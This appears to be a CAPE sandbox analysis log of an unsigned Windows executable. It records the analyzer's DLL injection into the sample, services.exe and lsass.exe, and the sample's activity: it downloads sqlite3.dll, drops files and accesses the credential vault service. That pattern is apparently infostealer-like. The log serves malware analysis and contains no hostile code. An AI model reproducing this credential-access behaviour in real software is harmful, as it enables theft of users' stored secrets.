Auto Tasks

#17834: Unpacker

Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-30 13:52:41 2020-06-30 13:59:00 379 seconds Show Options Show Log
route = tor
2020-05-13 09:26:00,040 [root] INFO: Date set to: 20200630T13:45:43, timeout set to: 200
2020-06-30 13:45:43,078 [root] DEBUG: Starting analyzer from: C:\tmp2ssujfce
2020-06-30 13:45:43,078 [root] DEBUG: Storing results at: C:\vYYpOL
2020-06-30 13:45:43,078 [root] DEBUG: Pipe server name: \\.\PIPE\fuukwRlLO
2020-06-30 13:45:43,078 [root] DEBUG: Python path: C:\Users\Louise\AppData\Local\Programs\Python\Python38-32
2020-06-30 13:45:43,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-30 13:45:43,078 [root] INFO: Automatically selected analysis package "exe"
2020-06-30 13:45:43,078 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-30 13:45:43,171 [root] DEBUG: Imported analysis package "exe".
2020-06-30 13:45:43,171 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-30 13:45:43,171 [root] DEBUG: Initialized analysis package "exe".
2020-06-30 13:45:43,390 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-30 13:45:43,453 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-30 13:45:43,453 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-30 13:45:43,578 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-30 13:45:43,578 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-30 13:45:43,656 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-30 13:45:43,656 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-30 13:45:43,703 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-30 13:45:43,703 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-30 13:45:43,703 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-30 13:45:43,718 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-30 13:45:43,750 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-30 13:45:43,750 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-30 13:45:43,812 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-30 13:45:43,812 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-30 13:45:43,812 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-30 13:45:43,812 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-30 13:45:43,812 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-30 13:45:43,812 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-30 13:45:43,843 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-30 13:45:43,843 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-30 13:45:46,468 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-30 13:45:46,515 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-30 13:45:46,531 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-30 13:45:46,546 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-30 13:45:46,546 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-30 13:45:46,546 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-30 13:45:46,546 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-30 13:45:46,578 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-30 13:45:46,578 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-30 13:45:46,578 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-30 13:45:46,578 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-30 13:45:46,578 [root] DEBUG: Started auxiliary module Browser
2020-06-30 13:45:46,578 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-30 13:45:46,593 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-30 13:45:46,593 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-30 13:45:46,593 [root] DEBUG: Started auxiliary module Curtain
2020-06-30 13:45:46,593 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-30 13:45:46,593 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-30 13:45:46,593 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-30 13:45:46,593 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-30 13:45:47,312 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-30 13:45:47,312 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-30 13:45:47,328 [root] DEBUG: Started auxiliary module DigiSig
2020-06-30 13:45:47,328 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-30 13:45:47,328 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-30 13:45:47,328 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-30 13:45:47,343 [root] DEBUG: Started auxiliary module Disguise
2020-06-30 13:45:47,343 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-30 13:45:47,343 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-30 13:45:47,343 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-30 13:45:47,359 [root] DEBUG: Started auxiliary module Human
2020-06-30 13:45:47,359 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-30 13:45:47,359 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-30 13:45:47,359 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-30 13:45:47,359 [root] DEBUG: Started auxiliary module Procmon
2020-06-30 13:45:47,359 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-30 13:45:47,359 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-30 13:45:47,359 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-30 13:45:47,359 [root] DEBUG: Started auxiliary module Screenshots
2020-06-30 13:45:47,359 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-30 13:45:47,375 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-30 13:45:47,375 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-30 13:45:47,375 [root] DEBUG: Started auxiliary module Sysmon
2020-06-30 13:45:47,375 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-30 13:45:47,375 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-30 13:45:47,375 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-30 13:45:47,375 [root] DEBUG: Started auxiliary module Usage
2020-06-30 13:45:47,375 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-30 13:45:47,375 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-30 13:45:47,375 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-30 13:45:47,375 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-30 13:45:47,578 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Louise\AppData\Local\Temp\MUo8TIzTu0DDL.exe" with arguments "" with pid 4716
2020-06-30 13:45:47,578 [lib.api.process] INFO: Monitor config for process 4716: C:\tmp2ssujfce\dll\4716.ini
2020-06-30 13:45:51,156 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\eIBxdfEo.dll, loader C:\tmp2ssujfce\bin\EogpBVN.exe
2020-06-30 13:45:52,296 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\fuukwRlLO.
2020-06-30 13:45:52,312 [root] DEBUG: Loader: Injecting process 4716 (thread 2004) with C:\tmp2ssujfce\dll\eIBxdfEo.dll.
2020-06-30 13:45:52,359 [root] DEBUG: Process image base: 0x00400000
2020-06-30 13:45:52,375 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\eIBxdfEo.dll.
2020-06-30 13:45:52,406 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:45:52,453 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\eIBxdfEo.dll.
2020-06-30 13:45:52,500 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4716
2020-06-30 13:45:54,515 [lib.api.process] INFO: Successfully resumed process with pid 4716
2020-06-30 13:45:54,843 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:45:54,859 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:45:54,875 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:45:54,921 [root] INFO: Loaded monitor into process with pid 4716
2020-06-30 13:45:54,921 [root] INFO: Disabling sleep skipping.
2020-06-30 13:45:54,937 [root] INFO: Disabling sleep skipping.
2020-06-30 13:45:54,937 [root] INFO: Disabling sleep skipping.
2020-06-30 13:45:59,750 [root] DEBUG: set_caller_info: Adding region at 0x04240000 to caller regions list (ntdll::LdrLoadDll).
2020-06-30 13:45:59,765 [root] DEBUG: set_caller_info: Adding region at 0x05AB0000 to caller regions list (kernel32::GetSystemTime).
2020-06-30 13:45:59,781 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x5ab0000
2020-06-30 13:45:59,781 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x05AB0000 size 0x400000.
2020-06-30 13:45:59,781 [root] DEBUG: DumpPEsInRange: Scanning range 0x5ab0000 - 0x5ab1000.
2020-06-30 13:45:59,781 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5ab0000-0x5ab1000.
2020-06-30 13:45:59,828 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\vYYpOL\CAPE\4716_47131056959511372020 (size 0xffe)
2020-06-30 13:45:59,828 [root] DEBUG: DumpRegion: Dumped stack region from 0x05AB0000, size 0x1000.
2020-06-30 13:45:59,859 [root] DEBUG: ScanForNonZero: Exception occured reading memory address 0x433ffff
2020-06-30 13:45:59,859 [root] DEBUG: DumpMemory: Nothing to dump at 0x04240000!
2020-06-30 13:45:59,859 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x04240000 size 0x100000.
2020-06-30 13:45:59,859 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4240000-0x4268000.
2020-06-30 13:45:59,937 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\vYYpOL\CAPE\4716_32195441459511372020 (size 0x27e67)
2020-06-30 13:45:59,937 [root] DEBUG: DumpRegion: Dumped stack region from 0x04240000, size 0x28000.
2020-06-30 13:45:59,984 [root] DEBUG: set_caller_info: Adding region at 0x07610000 to caller regions list (ntdll::LdrGetProcedureAddress).
2020-06-30 13:46:00,031 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\vYYpOL\CAPE\4716_83191264859511372020 (size 0x8d079)
2020-06-30 13:46:00,031 [root] DEBUG: DumpRegion: Dumped stack region from 0x07610000, size 0x8e000.
2020-06-30 13:46:00,031 [root] DEBUG: set_caller_info: Adding region at 0x00050000 to caller regions list (ntdll::LdrLoadDll).
2020-06-30 13:46:00,031 [root] DEBUG: set_caller_info: Failed to dumping calling PE image at 0x00050000.
2020-06-30 13:46:00,046 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\SHELL32 (0xc4c000 bytes).
2020-06-30 13:46:00,062 [root] DEBUG: DLL loaded at 0x74450000: C:\Windows\system32\USERENV (0x17000 bytes).
2020-06-30 13:46:00,062 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-30 13:46:00,078 [root] DEBUG: DLL loaded at 0x73240000: C:\Windows\system32\ktmw32 (0x9000 bytes).
2020-06-30 13:46:00,093 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\bcrypt (0x17000 bytes).
2020-06-30 13:46:00,093 [root] DEBUG: DLL loaded at 0x76A70000: C:\Windows\syswow64\CRYPT32 (0x122000 bytes).
2020-06-30 13:46:00,093 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-06-30 13:46:00,109 [root] DEBUG: DLL loaded at 0x6EA70000: C:\Windows\system32\WINHTTP (0x58000 bytes).
2020-06-30 13:46:00,109 [root] DEBUG: DLL loaded at 0x6EA20000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-30 13:46:00,125 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x110 amd local view 0x71170000 to global list.
2020-06-30 13:46:00,125 [root] DEBUG: DLL loaded at 0x71170000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\gdiplus (0x192000 bytes).
2020-06-30 13:46:00,140 [root] DEBUG: DLL loaded at 0x72EE0000: C:\Windows\system32\msvcr100 (0xbf000 bytes).
2020-06-30 13:46:00,156 [root] DEBUG: DLL loaded at 0x763F0000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-06-30 13:46:00,156 [root] DEBUG: DLL loaded at 0x760B0000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-06-30 13:46:00,171 [root] DEBUG: DLL unloaded from 0x762E0000.
2020-06-30 13:46:00,171 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2020-06-30 13:46:00,187 [root] DEBUG: DLL loaded at 0x743D0000: C:\Windows\system32\credssp (0x8000 bytes).
2020-06-30 13:46:00,187 [root] DEBUG: DLL unloaded from 0x744D0000.
2020-06-30 13:46:00,187 [root] DEBUG: DLL loaded at 0x74490000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-30 13:46:00,187 [root] DEBUG: DLL loaded at 0x746C0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-30 13:46:00,203 [root] DEBUG: DLL loaded at 0x72DE0000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-30 13:46:00,265 [root] DEBUG: DLL loaded at 0x70250000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-30 13:46:00,265 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-30 13:46:00,281 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-30 13:46:00,281 [root] DEBUG: DLL loaded at 0x70230000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-30 13:46:00,546 [root] DEBUG: DLL loaded at 0x739D0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-30 13:46:00,562 [root] DEBUG: DLL loaded at 0x73270000: C:\Windows\SysWOW64\schannel (0x41000 bytes).
2020-06-30 13:46:01,562 [root] DEBUG: DLL loaded at 0x73230000: C:\Windows\system32\secur32 (0x8000 bytes).
2020-06-30 13:46:01,578 [root] DEBUG: DLL loaded at 0x731F0000: C:\Windows\system32\ncrypt (0x39000 bytes).
2020-06-30 13:46:01,593 [root] DEBUG: DLL loaded at 0x731B0000: C:\Windows\SysWOW64\bcryptprimitives (0x3d000 bytes).
2020-06-30 13:46:01,687 [root] DEBUG: DLL loaded at 0x73250000: C:\Windows\system32\GPAPI (0x16000 bytes).
2020-06-30 13:46:01,828 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-30 13:46:01,859 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-30 13:46:08,765 [root] DEBUG: DLL loaded at 0x75B90000: C:\Windows\syswow64\urlmon (0x124000 bytes).
2020-06-30 13:46:08,765 [root] DEBUG: DLL loaded at 0x76EB0000: C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-30 13:46:08,781 [root] DEBUG: DLL loaded at 0x74E90000: C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-30 13:46:08,781 [root] DEBUG: DLL loaded at 0x76EF0000: C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-30 13:46:08,781 [root] DEBUG: DLL loaded at 0x76E40000: C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-30 13:46:08,781 [root] DEBUG: DLL loaded at 0x76EE0000: C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-30 13:46:08,781 [root] DEBUG: DLL loaded at 0x73590000: C:\Windows\system32\version (0x9000 bytes).
2020-06-30 13:46:08,796 [root] DEBUG: DLL loaded at 0x767F0000: C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-30 13:46:08,796 [root] DEBUG: DLL loaded at 0x766F0000: C:\Windows\syswow64\normaliz (0x3000 bytes).
2020-06-30 13:46:08,796 [root] DEBUG: DLL loaded at 0x76BA0000: C:\Windows\syswow64\iertutil (0x215000 bytes).
2020-06-30 13:46:08,828 [root] DEBUG: DLL loaded at 0x75CC0000: C:\Windows\syswow64\WININET (0x1c4000 bytes).
2020-06-30 13:46:08,843 [root] DEBUG: DLL loaded at 0x702A0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-30 13:46:08,859 [root] DEBUG: DLL loaded at 0x72DF0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-30 13:46:08,875 [root] DEBUG: DLL unloaded from 0x6EA70000.
2020-06-30 13:46:08,890 [root] DEBUG: DLL loaded at 0x76430000: C:\Windows\syswow64\OLEAUT32 (0x91000 bytes).
2020-06-30 13:46:08,921 [root] DEBUG: DLL loaded at 0x76170000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-06-30 13:46:08,921 [root] DEBUG: DLL loaded at 0x702D0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-30 13:46:08,921 [root] DEBUG: DLL loaded at 0x70310000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-30 13:46:08,937 [root] DEBUG: DLL loaded at 0x72E10000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-30 13:46:08,937 [root] DEBUG: DLL loaded at 0x702B0000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-30 13:46:08,968 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-30 13:46:08,968 [root] DEBUG: DLL loaded at 0x72E00000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-30 13:46:08,984 [root] DEBUG: DLL loaded at 0x73A10000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-30 13:46:08,984 [root] DEBUG: DLL unloaded from 0x746C0000.
2020-06-30 13:46:08,984 [root] DEBUG: DLL unloaded from 0x72DE0000.
2020-06-30 13:46:09,000 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x570 amd local view 0x73010000 to global list.
2020-06-30 13:46:09,000 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x580 amd local view 0x73000000 to global list.
2020-06-30 13:46:09,000 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x57c amd local view 0x73010000 to global list.
2020-06-30 13:46:09,015 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x73000000 for section view with handle 0x57c.
2020-06-30 13:46:11,343 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\sqlite3.dll
2020-06-30 13:46:12,968 [root] DEBUG: MapSectionViewHandler: Updated local view to 0x61E00000 for section view with handle 0x57c.
2020-06-30 13:46:12,968 [root] DEBUG: DLL loaded at 0x61E00000: C:\Users\Louise\AppData\LocalLow\sqlite3 (0xcb000 bytes).
2020-06-30 13:46:12,984 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\27XJCA2W\sqlite3[1].dll
2020-06-30 13:46:13,093 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\frAQBc8Wsa
2020-06-30 13:46:14,453 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\1xVPfvJcrg
2020-06-30 13:46:14,734 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\RYwTiizs2t
2020-06-30 13:46:15,015 [root] INFO: Added new file to list with pid None and path C:\Users\Louise\AppData\LocalLow\rQF69AzBla
2020-06-30 13:46:15,468 [root] DEBUG: DLL unloaded from 0x61E00000.
2020-06-30 13:46:15,500 [root] DEBUG: DLL loaded at 0x706B0000: C:\Windows\SysWOW64\ieframe (0xaba000 bytes).
2020-06-30 13:46:15,515 [root] DEBUG: DLL loaded at 0x73010000: C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2020-06-30 13:46:15,593 [root] DEBUG: DLL loaded at 0x73000000: C:\Windows\system32\vaultcli (0xc000 bytes).
2020-06-30 13:46:15,609 [root] DEBUG: DLL unloaded from 0x76700000.
2020-06-30 13:46:16,921 [root] INFO: Announced starting service "b'VaultSvc'"
2020-06-30 13:46:16,921 [lib.api.process] INFO: Monitor config for process 476: C:\tmp2ssujfce\dll\476.ini
2020-06-30 13:46:16,921 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2ssujfce\dll\VQuuxgB.dll, loader C:\tmp2ssujfce\bin\UaZPRPIj.exe
2020-06-30 13:46:16,953 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\fuukwRlLO.
2020-06-30 13:46:16,953 [root] DEBUG: Loader: Injecting process 476 (thread 0) with C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:16,953 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 3000, handle 0xa4
2020-06-30 13:46:16,953 [root] DEBUG: Process image base: 0x00000000FF5E0000
2020-06-30 13:46:16,953 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-06-30 13:46:16,953 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-06-30 13:46:16,968 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:46:16,968 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:46:16,968 [root] INFO: Disabling sleep skipping.
2020-06-30 13:46:16,984 [root] DEBUG: CAPE initialised: 64-bit monitor loaded in process 476 at 0x0000000070130000, image base 0x00000000FF5E0000, stack from 0x0000000000F46000-0x0000000000F50000
2020-06-30 13:46:16,984 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2020-06-30 13:46:17,031 [root] WARNING: b'Unable to place hook on LockResource'
2020-06-30 13:46:17,046 [root] WARNING: b'Unable to hook LockResource'
2020-06-30 13:46:17,109 [root] INFO: Loaded monitor into process with pid 476
2020-06-30 13:46:17,109 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-06-30 13:46:17,125 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-06-30 13:46:17,125 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,421 [root] INFO: Announced 64-bit process name: lsass.exe pid: 3704
2020-06-30 13:46:18,421 [lib.api.process] INFO: Monitor config for process 3704: C:\tmp2ssujfce\dll\3704.ini
2020-06-30 13:46:18,421 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2ssujfce\dll\VQuuxgB.dll, loader C:\tmp2ssujfce\bin\UaZPRPIj.exe
2020-06-30 13:46:18,437 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\fuukwRlLO.
2020-06-30 13:46:18,437 [root] DEBUG: Loader: Injecting process 3704 (thread 3708) with C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,437 [root] DEBUG: Process image base: 0x00000000FFC60000
2020-06-30 13:46:18,453 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,453 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:46:18,453 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,453 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3704
2020-06-30 13:46:18,453 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\lsass.exe.
2020-06-30 13:46:18,453 [root] DEBUG: CreateProcessHandler: Injection info set for new process 3704, ImageBase: 0x00000000FFC60000
2020-06-30 13:46:18,453 [root] INFO: Announced 64-bit process name: lsass.exe pid: 3704
2020-06-30 13:46:18,453 [lib.api.process] INFO: Monitor config for process 3704: C:\tmp2ssujfce\dll\3704.ini
2020-06-30 13:46:18,468 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2ssujfce\dll\VQuuxgB.dll, loader C:\tmp2ssujfce\bin\UaZPRPIj.exe
2020-06-30 13:46:18,468 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\fuukwRlLO.
2020-06-30 13:46:18,468 [root] DEBUG: Loader: Injecting process 3704 (thread 3708) with C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,484 [root] DEBUG: Process image base: 0x00000000FFC60000
2020-06-30 13:46:18,484 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,484 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-30 13:46:18,484 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:46:18,484 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3704
2020-06-30 13:46:18,484 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 3704.
2020-06-30 13:46:18,500 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-30 13:46:18,546 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-30 13:46:18,578 [root] INFO: Disabling sleep skipping.
2020-06-30 13:46:18,578 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-30 13:46:18,578 [root] DEBUG: CAPE initialised: 64-bit monitor loaded in process 3704 at 0x0000000070130000, image base 0x00000000FFC60000, stack from 0x00000000000D4000-0x00000000000E0000
2020-06-30 13:46:18,578 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2020-06-30 13:46:18,625 [root] WARNING: b'Unable to place hook on LockResource'
2020-06-30 13:46:18,625 [root] WARNING: b'Unable to hook LockResource'
2020-06-30 13:46:18,640 [root] INFO: Loaded monitor into process with pid 3704
2020-06-30 13:46:48,500 [root] INFO: Process with pid 3704 has terminated
2020-06-30 13:46:56,781 [root] INFO: Announced starting service "b'VaultSvc'"
2020-06-30 13:46:57,578 [root] INFO: Announced 64-bit process name: lsass.exe pid: 3176
2020-06-30 13:46:57,578 [lib.api.process] INFO: Monitor config for process 3176: C:\tmp2ssujfce\dll\3176.ini
2020-06-30 13:46:57,593 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2ssujfce\dll\VQuuxgB.dll, loader C:\tmp2ssujfce\bin\UaZPRPIj.exe
2020-06-30 13:47:00,546 [root] DEBUG: DLL unloaded from 0x75E90000.
2020-06-30 13:47:00,546 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\fuukwRlLO.
2020-06-30 13:47:00,562 [root] DEBUG: Loader: Injecting process 3176 (thread 3824) with C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:47:00,562 [root] DEBUG: Process image base: 0x00000000FFC60000
2020-06-30 13:47:00,578 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:47:00,578 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-30 13:47:00,609 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\VQuuxgB.dll.
2020-06-30 13:47:00,640 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3176
2020-06-30 13:47:00,656 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\lsass.exe.
2020-06-30 13:47:01,531 [root] DEBUG: CreateProcessHandler: Injection info set for new process 3176, ImageBase: 0x00000000FFC60000
2020-06-30 13:47:01,531 [root] INFO: Announced 64-bit process name: lsass.exe pid: 3176
2020-06-30 13:47:01,531 [lib.api.process] INFO: Monitor config for process 3176: C:\tmp2ssujfce\dll\3176.ini
2020-06-30 13:47:01,531 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2ssujfce\dll\VQuuxgB.dll, loader C:\tmp2ssujfce\bin\UaZPRPIj.exe
2020-06-30 13:47:07,531 [root] DEBUG: DLL unloaded from 0x6EA70000.
